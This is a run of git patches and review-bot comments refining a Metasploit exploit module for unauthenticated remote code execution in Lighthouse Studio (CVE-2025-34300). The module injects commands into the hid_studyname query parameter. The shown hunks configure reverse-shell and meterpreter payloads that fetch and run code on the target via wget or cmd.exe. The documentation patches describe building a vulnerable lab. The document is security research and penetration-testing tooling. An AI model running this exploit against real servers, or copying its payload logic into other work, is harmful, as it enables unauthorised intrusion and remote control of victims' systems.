From: Vognik <187316334+vognik@users.noreply.github.com> Date: Mon, 21 Jul 2025 21:34:41 +0400 Subject: [PATCH 10/18] Fix Tests --- .../multi/http/lighthouse_studio_unauth_rce_cve_2025_34300.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/multi/http/lighthouse_studio_unauth_rce_cve_2025_34300.rb b/modules/exploits/multi/http/lighthouse_studio_unauth_rce_cve_2025_34300.rb index 2404780117444..941a93491e216 100644 --- a/modules/exploits/multi/http/lighthouse_studio_unauth_rce_cve_2025_34300.rb +++ b/modules/exploits/multi/http/lighthouse_studio_unauth_rce_cve_2025_34300.rb @@ -171,4 +171,4 @@ def exploit execute_command(payload.encoded) end end -end \ No newline at end of file +end From 1c1b574b8111256fdca47f6c71b44a22376d039d Mon Sep 17 00:00:00 2001 From: Vognik <187316334+vognik@users.noreply.github.com> Date: Mon, 21 Jul 2025 21:37:52 +0400 Subject: [PATCH 11/18] Removed Debug Print --- .../multi/http/lighthouse_studio_unauth_rce_cve_2025_34300.rb | 1 - 1 file changed, 1 deletion(-) diff --git a/modules/exploits/multi/http/lighthouse_studio_unauth_rce_cve_2025_34300.rb b/modules/exploits/multi/http/lighthouse_studio_unauth_rce_cve_2025_34300.rb index 941a93491e216..82abd48594c1a 100644 --- a/modules/exploits/multi/http/lighthouse_studio_unauth_rce_cve_2025_34300.rb +++ b/modules/exploits/multi/http/lighthouse_studio_unauth_rce_cve_2025_34300.rb @@ -143,7 +143,6 @@ def execute_command(cmd, _opts = {}) query << "hid_studyname=#{datastore['STUDYNAME']}" unless datastore['STUDYNAME'].strip.empty? query_string = query.join('&') - print_status(query_string) res = send_request_cgi({ 'uri' => normalize_uri(target_uri.path), From d62ef448f17aef0dc4554666a4dc2d80ceedac70 Mon Sep 17 00:00:00 2001 
From: Vognik <187316334+vognik@users.noreply.github.com> Date: Tue, 22 Jul 2025 04:40:14 +0400 Subject: [PATCH 12/18] Code Review Edits --- .../lighthouse_studio_unauth_rce_cve_2025_34300.rb | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) diff --git a/modules/exploits/multi/http/lighthouse_studio_unauth_rce_cve_2025_34300.rb b/modules/exploits/multi/http/lighthouse_studio_unauth_rce_cve_2025_34300.rb index 82abd48594c1a..7b096b9dd99da 100644 --- a/modules/exploits/multi/http/lighthouse_studio_unauth_rce_cve_2025_34300.rb +++ b/modules/exploits/multi/http/lighthouse_studio_unauth_rce_cve_2025_34300.rb @@ -37,8 +37,8 @@ def initialize(info = {}) ['CVE', '2025-34300'], ['URL', 'https://slcyber.io/assetnote-security-research-center/rce-in-the-most-popular-survey-software-youve-never-heard-of/'] ], - 'Platform' => ['win', 'linux', 'unix'], - 'Arch' => [ARCH_CMD, ARCH_X64, ARCH_X86, ARCH_ARMLE, ARCH_AARCH64], + 'Platform' => ['multi'], + 'Arch' => [ARCH_CMD], 'Targets' => [ [ 'Linux Dropper', @@ -116,10 +116,10 @@ def check if res.body =~ /Lighthouse Studio (\d+_\d+_\d+)/ version_match = Regexp.last_match(1).to_s - print_status("Extracted version: #{version_match.gsub('_', '.')}") - version = Rex::Version.new(version_match.gsub('_', '')) + version = Rex::Version.new(version_match.gsub('_', '.')) + print_status("Extracted version: #{version}") - return CheckCode::Appears if version < Rex::Version.new(91614) + return CheckCode::Appears if version < Rex::Version.new('9.16.14') else print_error("#{peer} - Unable to extract version number") end From e93755adc6b7ce70e59fb6b4c4a07efe9e8231bc Mon Sep 17 00:00:00 2001 From: Vognik <187316334+vognik@users.noreply.github.com> Date: Wed, 23 Jul 2025 11:59:48 +0400 Subject: [PATCH 13/18] Added WritableDir Option --- .../http/lighthouse_studio_unauth_rce_cve_2025_34300.rb | 8 ++++++-- 1 file changed, 6 insertions(+), 2 deletions(-) 
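Review bot: With `Rex::Version.new(version_match.gsub('_', '.'))` and `Rex::Version.new('9.16.14')` the comparison itself is now correct, but the branch still only returns on `version < 9.16.14`; a host reporting 9.16.14 or newer falls through to the `html&.text&.include?('Lighthouse Studio')` test and is reported as `Detected`, where `CheckCode::Safe("Version #{version} is patched")` is the accurate answer. Adding an explicit `return CheckCode::Safe` after the `Appears` line closes that gap.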
diff --git a/modules/exploits/multi/http/lighthouse_studio_unauth_rce_cve_2025_34300.rb b/modules/exploits/multi/http/lighthouse_studio_unauth_rce_cve_2025_34300.rb index 7b096b9dd99da..789978e3c255d 100644 --- a/modules/exploits/multi/http/lighthouse_studio_unauth_rce_cve_2025_34300.rb +++ b/modules/exploits/multi/http/lighthouse_studio_unauth_rce_cve_2025_34300.rb @@ -85,7 +85,7 @@ def initialize(info = {}) 'DisclosureDate' => '2025-07-16', 'Notes' => { 'Stability' => [CRASH_SAFE], - 'SideEffects' => [IOC_IN_LOGS], + 'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK], 'Reliability' => [REPEATABLE_SESSION] } ) @@ -95,6 +95,7 @@ def initialize(info = {}) [ OptString.new('TARGETURI', [true, 'Path to vulnerable ciwweb.pl', '/cgi-bin/ciwweb.pl']), OptString.new('STUDYNAME', [false, 'Value for the hid_studyname GET parameter', '']), + OptString.new('WritableDir', [false, 'Writable directory for Windows Dropper', 'C:\\Windows\\Tasks\\']) ] ) end @@ -163,7 +164,10 @@ def exploit case target['Type'] when :windows_dropper - execute_cmdstager(temp: '.') + # This applies only to Windows + # The RCE doesn’t resolve environment variables like %TEMP%, so the path must be specified explicitly + # Files on the disk are also not deleted + execute_cmdstager(temp: datastore['WritableDir']) when :nix_dropper execute_cmdstager when :windows_command, :nix_command From 38b0bd15e1a3e6d3d20dc05e0af9cc5077178c0f Mon Sep 17 00:00:00 2001 From: Vognik <187316334+vognik@users.noreply.github.com> Date: Thu, 24 Jul 2025 07:19:25 +0400 Subject: [PATCH 14/18] Code Review Edits --- ...thouse_studio_unauth_rce_CVE_2025_34300.md | 4 ++ ...thouse_studio_unauth_rce_cve_2025_34300.rb | 67 +++++-------------- 2 files changed, 21 insertions(+), 50 deletions(-) diff --git a/documentation/modules/exploit/multi/http/lighthouse_studio_unauth_rce_CVE_2025_34300.md b/documentation/modules/exploit/multi/http/lighthouse_studio_unauth_rce_CVE_2025_34300.md index 10d7f1b23250a..661c9182cd737 100644 
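Review bot: `WritableDir` is registered for every target but consumed only by the `:windows_dropper` branch (`:nix_dropper` ignores it), so its description should say it is Windows-only, and the reason it exists, that the injection does not expand `%TEMP%` so the path must be literal, is operator-facing information that belongs in the option description and the module docs rather than only in a code comment. Since the comment also records that the dropped file is never deleted, print the full artifact path on success so the operator can remove it, or include `Msf::Exploit::FileDropper` and `register_file_for_cleanup` on the stager path so the session cleans up after itself.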
--- a/documentation/modules/exploit/multi/http/lighthouse_studio_unauth_rce_CVE_2025_34300.md +++ b/documentation/modules/exploit/multi/http/lighthouse_studio_unauth_rce_CVE_2025_34300.md @@ -299,6 +299,10 @@ If all configurations are correct, Lighthouse Studio will: - Initialize the MySQL database - Generate CGI scripts +OR (in case of any errors) + +Use this instruction to upload manually [Manual Upload to Server](https://sawtoothsoftware.com/help/lighthouse-studio/manual/manual-upload.html) + ## Scenario ``` diff --git a/modules/exploits/multi/http/lighthouse_studio_unauth_rce_cve_2025_34300.rb b/modules/exploits/multi/http/lighthouse_studio_unauth_rce_cve_2025_34300.rb index 789978e3c255d..cdad1a5daeb6f 100644 --- a/modules/exploits/multi/http/lighthouse_studio_unauth_rce_cve_2025_34300.rb +++ b/modules/exploits/multi/http/lighthouse_studio_unauth_rce_cve_2025_34300.rb @@ -7,7 +7,6 @@ class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient - include Msf::Exploit::CmdStager prepend Msf::Exploit::Remote::AutoCheck def initialize(info = {}) @@ -26,7 +25,7 @@ def initialize(info = {}) Successful exploitation may result in remote code execution under the privileges of the web server, potentially exposing sensitive data or disrupting survey operations. - An attacker can execute arbitrary system commands as the web server. + An attacker can execute arbitrary system commands in the context of the user running the web server. }, 'License' => MSF_LICENSE, 'Author' => [ 
@@ -41,45 +40,27 @@ def initialize(info = {}) 'Arch' => [ARCH_CMD], 'Targets' => [ [ - 'Linux Dropper', - { - 'Platform' => ['linux'], - 'Arch' => [ARCH_X64, ARCH_X86, ARCH_ARMLE, ARCH_AARCH64], - 'Type' => :nix_dropper, - 'DefaultOptions' => { 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp' } - } - ], - [ - 'Linux Command', + 'Unix Command', { 'Platform' => ['unix', 'linux'], - 'Arch' => [ARCH_CMD], - 'Type' => :nix_command, - 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse_bash' } - } - ], - [ - 'Windows Dropper', - { - 'Platform' => 'win', - 'Arch' => [ARCH_X64, ARCH_X86, ARCH_ARMLE, ARCH_AARCH64], - 'Type' => :windows_dropper, - 'DefaultOptions' => { - 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp' - } + 'Arch' => ARCH_CMD, + 'Type' => :unix_cmd + # Tested with cmd/unix/reverse_bash + # Tested with cmd/linux/http/x64/meterpreter/reverse_tcp } ], [ 'Windows Command', { - 'Platform' => 'win', - 'Arch' => [ARCH_CMD], - 'Type' => :windows_command, + 'Platform' => ['windows'], + 'Arch' => ARCH_CMD, + 'Type' => :win_cmd, 'DefaultOptions' => { - 'PAYLOAD' => 'cmd/windows/http/x64/meterpreter/reverse_tcp' + 'FETCH_WRITABLE_DIR' => 'C:\\\\Windows\\\\Tasks\\\\' } + # Tested with cmd/windows/http/x64/meterpreter/reverse_tcp } - ] + ], ], 'DefaultTarget' => 0, 'DisclosureDate' => '2025-07-16', @@ -95,7 +76,6 @@ def initialize(info = {}) [ OptString.new('TARGETURI', [true, 'Path to vulnerable ciwweb.pl', '/cgi-bin/ciwweb.pl']), OptString.new('STUDYNAME', [false, 'Value for the hid_studyname GET parameter', '']), - OptString.new('WritableDir', [false, 'Writable directory for Windows Dropper', 'C:\\Windows\\Tasks\\']) ] ) end 
@@ -133,8 +113,11 @@ def check CheckCode::Safe end - def execute_command(cmd, _opts = {}) - cmd = Rex::Text.uri_encode(cmd).gsub('\\', '%5C').gsub('/', '%2F') + def exploit + print_status('Uploading malicious payload...') + + cmd = Rex::Text.uri_encode(payload.encoded).gsub('\\', '%5C').gsub('/', '%2F') + cmd = "cmd.exe%20/q%20/c%20\"#{cmd}\"" if target['Type'] == :win_cmd query = [ 'hid_javascript=1', @@ -158,20 +141,4 @@ def execute_command(cmd, _opts = {}) end end end - - def exploit - print_status('Uploading malicious payload...') - - case target['Type'] - when :windows_dropper - # This applies only to Windows - # The RCE doesn’t resolve environment variables like %TEMP%, so the path must be specified explicitly - # Files on the disk are also not deleted - execute_cmdstager(temp: datastore['WritableDir']) - when :nix_dropper - execute_cmdstager - when :windows_command, :nix_command - execute_command(payload.encoded) - end - end end From 6e5d474b21a52c82218fec11a90892976c618bff Mon Sep 17 00:00:00 2001 From: Maksim Rogov <187316334+vognik@users.noreply.github.com> Date: Thu, 24 Jul 2025 06:23:01 +0300 Subject: [PATCH 15/18] Apply suggestion from @jheysel-r7 in Docs Co-authored-by: jheysel-r7 --- .../multi/http/lighthouse_studio_unauth_rce_CVE_2025_34300.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/documentation/modules/exploit/multi/http/lighthouse_studio_unauth_rce_CVE_2025_34300.md b/documentation/modules/exploit/multi/http/lighthouse_studio_unauth_rce_CVE_2025_34300.md index 661c9182cd737..a79f6f1593ff4 100644 --- a/documentation/modules/exploit/multi/http/lighthouse_studio_unauth_rce_CVE_2025_34300.md +++ b/documentation/modules/exploit/multi/http/lighthouse_studio_unauth_rce_CVE_2025_34300.md 
@@ -10,7 +10,7 @@ This vulnerability affects Lighthouse Studio versions prior to 9.16.14. Successful exploitation may result in remote code execution under the privileges of the web server, potentially exposing sensitive data or disrupting survey operations. -An attacker can execute arbitrary system commands as the web server. +An attacker can execute arbitrary system commands in the context of the user running the web server. ## STUDYNAME parameter From 82eadede83f9894326a3da7aabf2dd2df5d8ecde Mon Sep 17 00:00:00 2001 From: Vognik <187316334+vognik@users.noreply.github.com> Date: Fri, 25 Jul 2025 05:17:48 +0400 Subject: [PATCH 16/18] Code Review Edits from @sjanusz-r7 --- ...thouse_studio_unauth_rce_cve_2025_34300.rb | 24 +++++++++++++------ 1 file changed, 17 insertions(+), 7 deletions(-) diff --git a/modules/exploits/multi/http/lighthouse_studio_unauth_rce_cve_2025_34300.rb b/modules/exploits/multi/http/lighthouse_studio_unauth_rce_cve_2025_34300.rb index cdad1a5daeb6f..8ebb29897f633 100644 --- a/modules/exploits/multi/http/lighthouse_studio_unauth_rce_cve_2025_34300.rb +++ b/modules/exploits/multi/http/lighthouse_studio_unauth_rce_cve_2025_34300.rb @@ -44,7 +44,11 @@ def initialize(info = {}) { 'Platform' => ['unix', 'linux'], 'Arch' => ARCH_CMD, - 'Type' => :unix_cmd + 'Type' => :unix_cmd, + 'DefaultOptions' => { + # On Ubuntu 18.04.06 LTS curl is not installed by default + 'FETCH_COMMAND' => 'WGET' + } # Tested with cmd/unix/reverse_bash # Tested with cmd/linux/http/x64/meterpreter/reverse_tcp } 
@@ -56,12 +60,19 @@ def initialize(info = {}) 'Arch' => ARCH_CMD, 'Type' => :win_cmd, 'DefaultOptions' => { - 'FETCH_WRITABLE_DIR' => 'C:\\\\Windows\\\\Tasks\\\\' + # Environment variables like %TEMP% don't resolve + 'FETCH_WRITABLE_DIR' => '\\Windows\\Tasks\\' + }, + 'Payload' => { + 'Prepend' => 'cmd.exe /q /c ' } # Tested with cmd/windows/http/x64/meterpreter/reverse_tcp } ], ], + 'Payload' => { + 'BadChars' => '\\' + }, 'DefaultTarget' => 0, 'DisclosureDate' => '2025-07-16', 'Notes' => { @@ -93,7 +104,7 @@ def check 'method' => 'GET', 'vars_get' => vars ) - return CheckCode::Unknown('No response from target') unless res + return CheckCode::Unknown('No response from target') unless res&.code == 200 if res.body =~ /Lighthouse Studio (\d+_\d+_\d+)/ version_match = Regexp.last_match(1).to_s @@ -116,8 +127,7 @@ def check def exploit print_status('Uploading malicious payload...') - cmd = Rex::Text.uri_encode(payload.encoded).gsub('\\', '%5C').gsub('/', '%2F') - cmd = "cmd.exe%20/q%20/c%20\"#{cmd}\"" if target['Type'] == :win_cmd + cmd = Rex::Text.uri_encode(payload.encoded) query = [ 'hid_javascript=1', @@ -136,8 +146,8 @@ def exploit if res html = res.get_html_document - if html&.text&.include?('Cannot find default studyname') - fail_with(Failure::BadConfig, 'The STUDYNAME value is invalid') + if html&.text&.include?('Cannot find the study name') + fail_with(Failure::BadConfig, 'The STUDYNAME value was not found on the server') end end end From 8024900171082160ee67c10e84d13d67dc199437 Mon Sep 17 00:00:00 2001 From: Vognik <187316334+vognik@users.noreply.github.com> Date: Sat, 26 Jul 2025 03:15:00 +0400 Subject: [PATCH 17/18] fix tests --- .../multi/http/lighthouse_studio_unauth_rce_cve_2025_34300.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/multi/http/lighthouse_studio_unauth_rce_cve_2025_34300.rb b/modules/exploits/multi/http/lighthouse_studio_unauth_rce_cve_2025_34300.rb index 8ebb29897f633..9be72ec4dfddd 100644 
--- a/modules/exploits/multi/http/lighthouse_studio_unauth_rce_cve_2025_34300.rb +++ b/modules/exploits/multi/http/lighthouse_studio_unauth_rce_cve_2025_34300.rb @@ -64,7 +64,7 @@ def initialize(info = {}) 'FETCH_WRITABLE_DIR' => '\\Windows\\Tasks\\' }, 'Payload' => { - 'Prepend' => 'cmd.exe /q /c ' + 'Prepend' => 'cmd.exe /q /c' } # Tested with cmd/windows/http/x64/meterpreter/reverse_tcp } From b13f59128c61f3d10c86cc78805930bc03e43686 Mon Sep 17 00:00:00 2001 From: Vognik <187316334+vognik@users.noreply.github.com> Date: Mon, 18 Aug 2025 08:20:32 +0400 Subject: [PATCH 18/18] Added Setup Guide for Windows --- ...thouse_studio_unauth_rce_CVE_2025_34300.md | 37 ++++++++++++++++--- 1 file changed, 32 insertions(+), 5 deletions(-) diff --git a/documentation/modules/exploit/multi/http/lighthouse_studio_unauth_rce_CVE_2025_34300.md b/documentation/modules/exploit/multi/http/lighthouse_studio_unauth_rce_CVE_2025_34300.md index a79f6f1593ff4..0436d3fe7df3d 100644 --- a/documentation/modules/exploit/multi/http/lighthouse_studio_unauth_rce_CVE_2025_34300.md +++ b/documentation/modules/exploit/multi/http/lighthouse_studio_unauth_rce_CVE_2025_34300.md @@ -19,6 +19,8 @@ The `hid_studyname` parameter serves as the identifier of the survey or test bei ## Testing +### Setup a Linux Server to Host the Lighhouse Survey + To set up a test environment: 1. Download and Install Ubuntu 18.04.6 LTS 
@@ -230,14 +232,16 @@ sudo systemctl restart apache2 Now CGI scripts in /var/www/html/cgi-bin/ should be executable. -11. Download and Install Windows (on Second VM) +### Create the Lighthouse Survey + +1. Download and Install Windows (on Second VM) Download Windows 10 ISO from the official Microsoft site: https://www.microsoft.com/en-us/software-download/windows10 Follow standard installation steps in your hypervisor (e.g., VirtualBox, VMware, etc.). -12. Download and Install Vulnerable Lighthouse Studio +2. Download and Install Vulnerable Lighthouse Studio This is the vulnerable application used to build and upload surveys. @@ -248,7 +252,7 @@ https://sawtoothsoftware.com/resources/software-downloads/lighthouse-studio/vers Install Lighthouse Studio using default options. -13. Create and Save a New Study +3. Create and Save a New Study Use @@ -259,7 +263,7 @@ File -> New Study and follow instructions. In the end save the study. -14. Upload the Study to the Ubuntu VM +4. Upload the Study to the Ubuntu VM To host your survey on the Ubuntu VM: @@ -289,7 +293,7 @@ In the "Advanced" Tab Set the Database Server Host Name — enter the IP address of your Ubuntu VM. -15. Upload the Survey to Server +5. Upload the Survey to Server Click the "Upload Survey to Server" button. 
@@ -303,6 +307,29 @@ OR (in case of any errors) Use this instruction to upload manually [Manual Upload to Server](https://sawtoothsoftware.com/help/lighthouse-studio/manual/manual-upload.html) +## Setup a Windows Server to Host Lighthouse Survey + +1. Install xampp + +2. Place survey for manual upload in c:\xampp\htdocs\ + +3. Install Perl 5.38 + +- Avoid installing 5.40 as it's missing some essential MySQL libraries required to connect the Lighthouse survey to database which is required in order to exploit this vulnerability + +3. Either find and replace these with #!C:/Strawberry/perl/bin/perl.exe or edit the apache config such that Apache will always send these files to Strawberry Perl +- The .pl and .cgi files LightHouse generates will start with #!/usr/bin/pearl which windows will fail to interpret + +4. Make the same edits to the Apache config as you would do on Linux to make the cgi scripts executable + +5. Install the same Perl modules as you would during the Linux install + +6. In phpMyAdmin, create the DB user and DB specified in the Survey you created in Lighthouse + +7. Ensure the user has the necessary privileges over the DB + +8. Navigate the to the //WebUpload/cgi-bin/admin.pl endpoint in the survey, authenticate with the admin credentials and ensure the the DB is connected and there were no errors durning setup + ## Scenario ```
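Review bot: In PATCH 12, hunk `@@ -116,10 +116,10 @@ def check`, the switch to `Rex::Version.new(version_match.gsub('_', '.'))` compared against `Rex::Version.new('9.16.14')` is the right fix, and it is worth a regression spec: the old form stripped the underscores and compared the result with the integer `91614`, so `9_17_0` became `9170`, which sorts below `91614` and would have been reported as `Appears` even though 9.17.0 is past the fixed version. A spec feeding `9_16_13`, `9_16_14` and `9_17_0` through `check` would pin the new behaviour. The regex `/Lighthouse Studio (\d+_\d+_\d+)/` only matches three-part versions, so a two-part banner falls through to `print_error` and `CheckCode::Safe`; if that is intended, a short comment saying so would help.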
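Review bot: In PATCH 14, hunk `@@ -41,45 +40,27 @@ def initialize`, the Windows default `'FETCH_WRITABLE_DIR' => 'C:\\\\Windows\\\\Tasks\\\\'` is a single-quoted Ruby string, so `\\\\` is two literal backslashes and the option value becomes `C:\\Windows\\Tasks\\`. PATCH 16 corrects this to `'\\Windows\\Tasks\\'` (single backslashes) but also drops the drive letter, which makes the path relative to the web server process's current drive; that works when the server runs from the system drive, so please state that assumption next to the existing `# Environment variables like %TEMP% don't resolve` comment, or explain why `C:` had to go. In the same hunk `'Platform' => ['windows']` while the Unix target uses `['unix', 'linux']`; both resolve, but the earlier revision used `'win'`, and the module should pick one spelling.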
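Review bot: In PATCH 14, hunk `@@ -133,8 +113,11 @@ def check`, the status line `print_status('Uploading malicious payload...')` is misleading for what follows: the module sends a single GET whose query string carries the command, nothing is uploaded. `print_status('Sending payload in hid_studyname request...')` or similar would match the code. The same hunk builds `cmd = "cmd.exe%20/q%20/c%20\"#{cmd}\""` with literal, unencoded double quotes inside an otherwise percent-encoded query; PATCH 16 replaces this with a target-level `Prepend`, so the status message is the only part that survives and still needs the wording fix.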
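Review bot: In PATCH 16, hunk `@@ -116,8 +127,7 @@ def check`, dropping `.gsub('\\', '%5C').gsub('/', '%2F')` leans on an undocumented property of `Rex::Text.uri_encode`: its default `hex-normal` mode leaves `/`, `\`, `.` and `-` unencoded, which is why the earlier revision encoded those two characters by hand. After this change backslashes are kept out of the command by the new module-level `'Payload' => { 'BadChars' => '\\' }` rather than encoded, and forward slashes now reach `ciwweb.pl` raw. Please add a comment on the `BadChars` entry saying it exists because `uri_encode` does not escape backslashes, and confirm in the PR that the Windows fetch command, whose `FETCH_WRITABLE_DIR` path contains backslashes, still generates once `\` is a bad character (it would have to go through a cmd encoder), and that raw `/` in the query is accepted by the server, since the previous `%2F` suggests it was once needed.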
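Review bot: In PATCH 16, hunk `@@ -93,7 +104,7 @@ def check`, `return CheckCode::Unknown('No response from target') unless res&.code == 200` now reports a 403, 404 or 500 as "No response from target", which sends the operator down the wrong path. Split it into `return CheckCode::Unknown('No response from target') unless res` followed by `return CheckCode::Unknown("Unexpected HTTP status #{res.code}") unless res.code == 200` so the message reflects what actually came back.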
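Review bot: In PATCH 16, hunk `@@ -136,8 +146,8 @@ def exploit`, the server error text matched by `html&.text&.include?('Cannot find the study name')` changed from `'Cannot find default studyname'`; the module documentation's STUDYNAME section describes this error as the signal that `STUDYNAME` must be set, so it needs the same string or the two will disagree. Also, because the check sits under `if res`, a comment noting that a nil response is the normal outcome when a blocking payload fires would stop a future reader from "fixing" it into a failure.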
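Review bot: In PATCH 17, hunk `@@ -64,7 +64,7 @@ def initialize`, changing `'Prepend' => 'cmd.exe /q /c '` to `'Prepend' => 'cmd.exe /q /c'` removes the only separator visible between the prepend and the fetch command, and the commit message "fix tests" does not say why that is safe. Please add a one-line comment stating where the space comes from (or that the payload text supplies its own), otherwise the next reviewer will put the trailing space back.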
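Review bot: In PATCH 18, hunk `@@ -19,6 +19,8 @@ The hid_studyname parameter`, the new heading `### Setup a Linux Server to Host the Lighhouse Survey` misspells the product; it should read `Lighthouse`, and "Set up" is the verb form. The matching Windows section added later in the same patch is an `##` heading, so the two should use the same level.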
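Review bot: In PATCH 18, hunk `@@ -303,6 +307,29 @@ OR (in case of any errors)`, the Windows setup list has two steps numbered `3.`, and several typos: `#!/usr/bin/pearl` should be `#!/usr/bin/perl` (the actual shebang Lighthouse emits), "Navigate the to the" should be "Navigate to the", "ensure the the DB" has a doubled word, "durning" should be "during", and "xampp" is normally written XAMPP. The step "Make the same edits to the Apache config as you would do on Linux" and "Install the same Perl modules as you would during the Linux install" would be easier to follow with a reference to the numbered Linux steps they mean. The surrounding context from PATCH 14, `OR (in case of any errors) Use this instruction to upload manually`, reads awkwardly; "If the upload fails, follow the Manual Upload to Server instructions" keeps the link and the meaning.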